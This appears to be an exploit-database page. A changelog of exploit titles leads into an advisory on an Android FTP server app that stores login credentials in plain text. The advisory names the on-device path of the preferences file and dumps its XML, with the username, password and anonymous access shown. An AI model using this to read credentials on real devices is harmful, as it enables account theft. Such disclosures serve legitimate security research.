
5 changes to exploits/shellcodes macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Local Privilege Escalation Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x64 Pre-Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x64 Post-Anniversary) - Local Privilege Escalation Fortinet FortiClient 5.2.3 (Windows 10 x86) - Local Privilege Escalation Ftp Server 1.32 - Credential Disclosure WordPress Form Maker Plugin 1.12.24 - SQL Injection WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection Monstra CMS < 3.0.4 - Cross-Site Scripting Automation
33 lines
No EOL
1.3 KiB
Text
33 lines
No EOL
1.3 KiB
Text
# Exploit Title: Ftp Server 1.32 - Credential Disclosure
|
|
# Date: 2018-05-29
|
|
# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver
|
|
# Version: 1.32 Android App
|
|
# Vendor: The Olive Tree
|
|
# Exploit Author: ManhNho
|
|
# CVE: N/A
|
|
# Category: Mobile Apps
|
|
# Tested on: Android 4.4
|
|
|
|
# Description
|
|
# Ftp Server 1.32 Insecure Data Storage, the result of storing confidential
|
|
# information insecurely on the system i.e. poor encryption, plain text,
|
|
# access control issues etc. Attacker can find out username/password of valid user via
|
|
# /data/data/com.theolivetree.ftpserver/shared_prefs/com.theolivetree.ftpserver_preferences.xml
|
|
|
|
# PoC
|
|
|
|
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
|
|
<map>
|
|
<string name="prefPort">2221</string>
|
|
<string name="prefPasivePort">2300-2399</string>
|
|
<string name="prefUserpass">ManhNho</string>
|
|
<boolean name="prefEnergySave" value="false" />
|
|
<boolean name="prefShowHidden" value="false" />
|
|
<boolean name="prefShowCredentials" value="true" />
|
|
<string name="prefInterfaces">0</string>
|
|
<string name="prefHomeDir">1</string>
|
|
<string name="prefUsername">ManhNho</string>
|
|
<boolean name="prefReadonly" value="false" />
|
|
<boolean name="prefAnonymous" value="true" />
|
|
<boolean name="prefForeground" value="true" />
|
|
</map> |